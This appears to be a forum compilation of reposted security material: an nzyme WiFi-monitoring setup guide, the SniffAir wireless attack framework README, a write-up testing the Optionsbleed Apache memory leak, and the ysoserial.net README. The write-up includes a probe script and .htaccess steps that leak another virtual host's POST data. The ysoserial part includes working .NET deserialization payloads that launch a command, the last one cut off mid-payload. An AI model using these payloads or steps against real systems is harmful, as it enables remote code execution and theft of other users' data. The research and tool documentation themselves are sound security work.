Nzyme is able to put the onboard WiFi adapter of recent MacBooks into monitor mode, so you don't need an external adapter for testing. Remember that you cannot be connected to a wireless network while running nzyme, so the Graylog setup you send data to has to be local, or you need a wired network connection or a second WiFi adapter as LAN/WAN uplink.

Make sure you have Java 7 or 8 installed:

$ java -version
java version "1.8.0_121"
Java(TM) SE Runtime Environment (build 1.8.0_121-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)

Download and configure
Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file:

nzyme_id = nzyme-macbook-1
channels = en0:1,2,3,4,5,6,8,9,10,11
channel_hop_command = sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport {interface} channel {channel}
channel_hop_interval = 1
graylog_addresses = graylog.example.org:12000
beacon_frame_sampling_rate = 0

Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments.

Run
After disconnecting from all WiFi networks (you might have to "forget" them in the macOS WiFi settings), you can start nzyme like this:

$ java -jar nzyme-0.1.jar -c nzyme.conf
18:35:00.261 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated.
18:35:00.307 [main] WARN horse.wtf.nzyme.Nzyme - No Graylog uplinks configured. Falling back to Log4j output
18:35:00.459 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [en0]
18:35:00.474 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [en0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11>.
18:35:00.483 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [en0] ... (⌐■_■)–︻╦╤─ – – pew pew

Nzyme is now collecting data and writing it into the Graylog input you configured.

Installation and configuration on a Raspberry Pi 3

Requirements
The onboard WiFi chips of recent Raspberry Pi models can be put into monitor mode with the alternative nexmon driver. The problem is that the onboard antenna is not very good. If possible, use an external adapter that supports monitor mode instead.

Make sure you have Java 7 or 8 installed:

$ java -version
openjdk version "1.8.0_40-internal"
OpenJDK Runtime Environment (build 1.8.0_40-internal-b04)
OpenJDK Zero VM (build 25.40-b08, interpreted mode)

Download and configure
Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file:

nzyme_id = nzyme-sensors-1
channels = wlan0:1,2,3,4,5,6,8,9,10,11,12,13,14|wlan1:36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112
channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel}
channel_hop_interval = 1
graylog_addresses = graylog.example.org:12000
beacon_frame_sampling_rate = 0

Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments.

Run
$ java -jar nzyme-0.1.jar -c nzyme.conf
17:28:45.657 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated.
17:28:51.637 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan0]
17:28:53.178 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11,12,13,14>.
17:28:53.268 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan0] ... (⌐■_■)–︻╦╤─ – – pew pew
17:28:54.926 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan1]
17:28:56.238 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan1] acquired. Cycling through channels <36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112>.
17:28:56.247 [nzyme-loop-1] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan1] ... (⌐■_■)–︻╦╤─ – – pew pew

Collected frames will now start appearing in your Graylog setup. Note that DEB and RPM packages are in the making and will be released soon.

Renaming WiFi interfaces (optional)
The interface names wlan0, wlan1 etc. are not always deterministic. Sometimes they can change after a reboot and suddenly nzyme will attempt to use the onboard WiFi chip that does not support monitor mode. To avoid this problem, you can "pin" interface names by MAC address. I like to rename the onboard chip to wlanBoard to avoid accidental usage. This is what ifconfig looks like with no external WiFi adapters plugged in.
pi@parabola:~ $ ifconfig
eth0      Link encap:Ethernet  HWaddr b8:27:eb:0f:0e:d4
          inet addr:172.16.0.136  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1327 errors:0 dropped:22 overruns:0 frame:0
          TX packets:1118 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:290630 (283.8 KiB)  TX bytes:233228 (227.7 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:304 errors:0 dropped:0 overruns:0 frame:0
          TX packets:304 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:24552 (23.9 KiB)  TX bytes:24552 (23.9 KiB)

wlan0     Link encap:Ethernet  HWaddr b8:27:eb:5a:5b:81
          inet6 addr: fe80::77be:fb8a:ad75:cca9/64 Scope:Link
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

In this case wlan0 is the onboard WiFi chip that we want to rename to wlanBoard. Open the file /lib/udev/rules.d/75-persistent-net-generator.rules and add wlan* to the device name whitelist:

# device name whitelist
KERNEL!="wlan*|ath*|msh*|ra*|sta*|ctc*|lcs*|hsi*", \
GOTO="persistent_net_generator_end"

Reboot the system. After it is back up, open /etc/udev/rules.d/70-persistent-net.rules and change the NAME variable:

SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="b8:27:eb:5a:5b:81", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlanBoard"

Reboot the system again and enjoy the consistent naming. Any new WiFi adapter you plug in will be a classic, numbered wlan0, wlan1 etc. that can be safely referenced in the nzyme config without the chance of accidentally selecting the onboard chip, because it's called wlanBoard now.

eth0      Link encap:Ethernet  HWaddr b8:27:eb:0f:0e:d4
          inet addr:172.16.0.136  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:349 errors:0 dropped:8 overruns:0 frame:0
          TX packets:378 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:75761 (73.9 KiB)  TX bytes:69865 (68.2 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:228 errors:0 dropped:0 overruns:0 frame:0
          TX packets:228 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:18624 (18.1 KiB)  TX bytes:18624 (18.1 KiB)

wlanBoard Link encap:Ethernet  HWaddr b8:27:eb:5a:5b:81
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Known issues
- Some WiFi adapters will not report the MAC timestamp in the radiotap header. The field will simply be missing in Graylog. This is usually an issue with the driver.
- The deauthentication and disassociation reason field is not reported correctly on some systems. This is known to be an issue on a 2016 MacBook Pro running macOS Sierra.

Legal notice
Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme never decrypts any data; it only reads unencrypted data on unlicensed frequencies.

Sursa: https://github.com/lennartkoopmann/nzyme
SniffAir
SniffAir is an open-source wireless security framework. SniffAir allows for the collection, management, and analysis of wireless traffic. In addition, SniffAir can also be used to perform sophisticated wireless attacks. SniffAir was born out of the hassle of managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic. SniffAir is developed by @Tyl0us and @theDarracott.

Install
To install, run the setup.py script:

$ python setup.py

Usage
(@Tyl0us & @theDarracott)

>> [default]# help
Commands
========
workspace             Manages workspaces (create, list, load, delete)
live_capture          Initiates a valid wireless interface to collect wireless packets to be parsed (requires the interface name)
offline_capture       Begins parsing wireless packets using a pcap file - Kismet .pcapdump files work best (requires the full path)
offline_capture_list  Begins parsing wireless packets using a list of pcap files - Kismet .pcapdump files work best (requires the full path)
query                 Executes a query on the contents of the active workspace
help                  Displays this help menu
clear                 Clears the screen
show                  Shows the contents of a table, specific information across all tables or the available modules
inscope               Add ESSID to scope. inscope [ESSID]
use                   Use a SniffAir module
info                  Displays all variable information regarding the selected module
set                   Sets a variable in a module
exploit               Runs the loaded module
exit                  Exit SniffAir
>> [default]#

Begin
First create or load a new or existing workspace using the command workspace create <workspace> or workspace load <workspace>. To view all existing workspaces use the workspace list command, and the workspace delete <workspace> command to delete the desired workspace:

>> [default]# workspace
Manages workspaces
Command Option: workspaces [create|list|load|delete]
>> [default]# workspace create demo
[+] Workspace demo created

Load data into a desired workspace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files, use the command offline_capture_list <the full path to the file containing the list of pcap names> (this file should contain the full paths to each pcap file).

>> [demo]# offline_capture /root/sniffair/demo.pcapdump
[+] Completed
[+] Cleaning Up Duplicates
[+] ESSIDs Observed

Show Command
The show command displays the contents of a table, specific information across all tables or the available modules, using the following syntax:

>> [demo]# show table AP
+------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+
| ID   | ESSID     | BSSID             | VENDOR                        | CHAN   | PWR   | ENC   | CIPHER   | AUTH   |
|------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------|
| 1    | HoneyPot  | c4:6e:1f:0c:82:03 | TP-LINK TECHNOLOGIES CO. LTD. | 4      | -17   | WPA2  | TKIP     | MGT    |
| 2    | Demo      | 80:2a:a8:5a:fb:2a | Ubiquiti Networks Inc.        | 11     | -19   | WPA2  | CCMP     | PSK    |
| 3    | Demo5ghz  | 82:2a:a8:5b:fb:2a | Unknown                       | 36     | -27   | WPA2  | CCMP     | PSK    |
| 4    | HoneyPot1 | c4:6e:1f:0c:82:05 | TP-LINK TECHNOLOGIES CO. LTD. | 36     | -29   | WPA2  | TKIP     | PSK    |
| 5    | BELL456   | 44:e9:dd:4f:c2:7a | Sagemcom Broadband SAS        | 6      | -73   | WPA2  | CCMP     | PSK    |
+------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+

>> [demo]# show SSIDS
---------
HoneyPot
Demo
HoneyPot1
BELL456
Hidden
Demo5ghz
---------

The query command can be used to display a unique set of data based on the parameters specified. The query command uses SQL syntax.

Modules
Modules can be used to analyze the data contained in the workspaces or to perform offensive wireless attacks, using the use <module name> command. For some modules additional variables may need to be set. They can be set using the set command: set <variable name> <variable value>:

>> [demo]# show modules
Available Modules
[+] Run Hidden SSID
[+] Evil Twin
[+] Captive Portal
[+] Auto EAP
[+] Exporter
>> [demo]#
>> [demo]# use Captive Portal
>> [demo][Captive Portal]# info
Globally Set Varibles
=====================
Module: Captive Portal
Interface:
SSID:
Channel:
Template: Cisco (More to be added soon)

>> [demo][Captive Portal]# set Interface wlan0
>> [demo][Captive Portal]# set SSID demo
>> [demo][Captive Portal]# set Channel 1
>> [demo][Captive Portal]# info
Globally Set Varibles
=====================
Module: Captive Portal
Interface: wlan0
SSID: demo
Channel: 1
Template: Cisco (More to be added soon)

>> [demo][Captive Portal]#

Once all variables are set, execute the exploit command to run the desired attack.

Export
To export all information stored in a workspace's tables, use the Exporter module and set the desired path.

Sursa: https://github.com/Tylous/SniffAir
Testing Optionsbleed
Written by: Mike Czumak
Written on: September 23, 2017

Introduction
I took a few minutes to test the Optionsbleed vuln (CVE-2017-9798), specifically to see whether modifying the length and/or quantity of Options/Methods in the .htaccess file would enable me to extract anything of substance from memory. Ultimately, it seems that by modifying the length of the entries in the .htaccess file, I was able to gain access to hundreds of bytes of POST data of a different virtual host.

Details
My setup was simple... two virtual hosts running on an Apache server hosted on a Linux VM. Each virtual host ran on a different port and had separate directories and error logs. Virtual Host 1 (running on port 80) was simply hosting a "hello" index.html. This was going to be my "attacker" site that would host the malicious .htaccess file. Virtual Host 2 (the "victim" site running on port 81) was hosting a PHP page that takes three inputs... username, password, and a third, variable-length variable.

<?php
$user = $_POST["username"];
$pwd = $_POST["password"];
$otherdata = $_POST["otherdata"];
?>
<form action="index.php" method="POST">
Otherdata: <input type="text" name="otherdata"><br>
Username: <input type="text" name="username"><br>
Password: <input type="text" name="password"><br>
<input type="submit" value="Submit">
</form>

Throughout the remainder of this post, I'll refer to them as Site1 (attacker site on Virtual Host 1) and Site2 (victim site on Virtual Host 2). I started with an .htaccess file on Site1 that looked as follows:

<Limit method0 method1 method2 method3 method4 method5>
Allow from all
</Limit>

Making several OPTIONS requests for Site1 resulted in a modified but fairly innocuous Allow header:

Allow: GET,POST,OPTIONS,HEAD,,allow,,,,,,,,,,,,,,,

Slight modifications in content and length did return a few varying bytes, but nothing very different from the examples I had already seen online and nothing that was of particular interest.
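To reproduce this kind of probing without Burp, here is a small Python sketch that hammers a server with OPTIONS requests and flags any Allow header that drifts from the baseline, which is the telltale sign of Optionsbleed (host and path are placeholders):

# Optionsbleed probe: repeated OPTIONS requests against the test vhost;
# a changing Allow header indicates bytes leaked from process memory.
import http.client

baseline = None
for i in range(1000):
    conn = http.client.HTTPConnection("site1.example.com", 80)
    conn.request("OPTIONS", "/")
    allow = conn.getresponse().getheader("Allow")
    conn.close()
    if baseline is None:
        baseline = allow
    elif allow != baseline:
        print(f"[{i}] Allow header drifted: {allow!r}")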
I started extending the length of each option/method in the .htacess file (using a simple numeric string of 0123456789) until I got to the following <Limit 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 
01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> Allow from all </Limit> It’s three entries of different lengths: 100, 3000, and 2000. After multiple OPTIONS requests I got this: Definitely good length, but the content is uninteresting. I let Burp Intruder continue to make OPTIONS requests while I submitted a test POST request on Site2. While the POST on Site2 was successful, my OPTIONS requests running on Site1 began generating 500 errors. I looked at the error log on Site1 and saw multiple entries of varying content that looked like the following: [Thu Sep 21 23:45:44.990337 2017] [http:error] [pid 74566] [client 192.168.1.234:62875] AH02430: Response header 'Allow' value of 'GET,OPTIONS,POST,HEAD,0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901(@\xe8\x0f\xb2\x7f' contains invalid characters, aborting requ It appeared that some of the non-ASCII content it was grabbing from memory was making the request invalid to Apache, resulting in the 500 error. I figured it was a long-shot but I tried HttpProtocolOptions Unsafe to see if it could be returned to the client but some of the characters were still considered invalid. Nevertheless, I figured it didn’t matter much given the more viable attack vector would be a malicious actor modifying the .htaccess file on their virtual host of a shared hosting environment. It would stand to reason that they would also have access to their own web server error logs as well (and wouldn’t need to rely on data returned to the client). 
So, now I wanted to see if it was possible to access the POST data from Site2 in the error log of Site1 by modifying the .htaccess file further. After a bit of trial and error, I was able to consistently obtain POST data from Site2 in Site1's error logs by doing the following:

First, I used the earlier .htaccess file with the initial set of three varying-length numerical strings (100, 3000, 2000) and made a few thousand OPTIONS requests via Burp Intruder. Then, I switched up the .htaccess file to read as follows:

<Limit 0123456789 0123456789 0123456789>
Allow from all
</Limit>

I left Burp Intruder OPTIONS requests running on Site1 with this .htaccess file, which began to generate 500 errors. While that was running, I submitted the following request to the PHP page on Site2. And here's what I got in the error log on Site1:

If you try to replicate this, you may get different results, especially if you deviate in length for either the .htaccess entries or the POST request on Virtual Host 2. Obviously, in an attack scenario, only the .htaccess file would be under the bad actor's control and the POST request on another virtual host would be unpredictable in content and length. However, I did find that varying lengths still resulted in data captured in the error log... it just may not be consistent. Experiment to see for yourself.

UPDATE #1: I intentionally didn't speculate on whether these test results are in any way significant, simply because I may be missing something that would make this impractical in un-patched environments. Most organizations aren't likely going to have exposed shared hosting environments in their own network anyway (and if they do provide the ability for untrusted actors to modify .htaccess on their servers, they have bigger problems). For those that have web applications hosted by external hosting providers, my test environment may have been too simple, or I might be missing a key consideration regarding shared memory and the typical multi-tenant hosting environment. In any event, I figured I would share these results in case it's helpful for others to investigate further and either replicate or disprove the results.

UPDATE #2: I have been able to get the POST data from Site2 to return directly to the client without generating an error fairly consistently by swapping out the values in the .htaccess file multiple times while the OPTIONS requests are running. Here is what has been working for me:
1. Start running the OPTIONS requests on Site1 using Intruder (I just let it run for 99,999 requests) using the 100, 3000, 2000 length values in .htaccess.
2. Modify .htaccess to use the three smaller 0123456789, 0123456789, 0123456789 values as shown previously.
3. Switch back to the 100, 3000, 2000 lengths.
4. Modify the .htaccess file again, this time using ten 0123456789 values.
5. Submit the POST request on Site2.

Below is the result in *most* cases. Again, keep in mind that this is partly dependent upon the length of the POST request submitted on Site2. You can adjust the length of the testdata string to see how your results vary.

Until next time,
Mike

Sursa: https://www.securitysift.com/testing-optionsbleed/
-
ysoserial.net

A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization.

Description

ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.

This project is inspired by Chris Frohoff's ysoserial project.

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

This software is a personal project and is not related to any company, including the project owner's and contributors' employers.

Usage

$ ./ysoserial -h
ysoserial.net generates deserialization payloads for a variety of .NET formatters.

Available formatters:
    ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.)
        Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter
    ObjectDataProvider (ObjectDataProvider gadget by Oleksandr Mirosh and Alvaro Munoz)
        Formatters: Json.Net FastJson JavaScriptSerializer
    PSObject (PSObject gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
        Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter
    TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw)
        Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter

Usage: ysoserial.exe [options]
Options:
    -o, --output=VALUE     the output format (raw|base64).
    -g, --gadget=VALUE     the gadget chain.
    -f, --formatter=VALUE  the formatter.
    -c, --command=VALUE    the command to be executed.
    -t, --test             whether to run payload locally.
Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAg
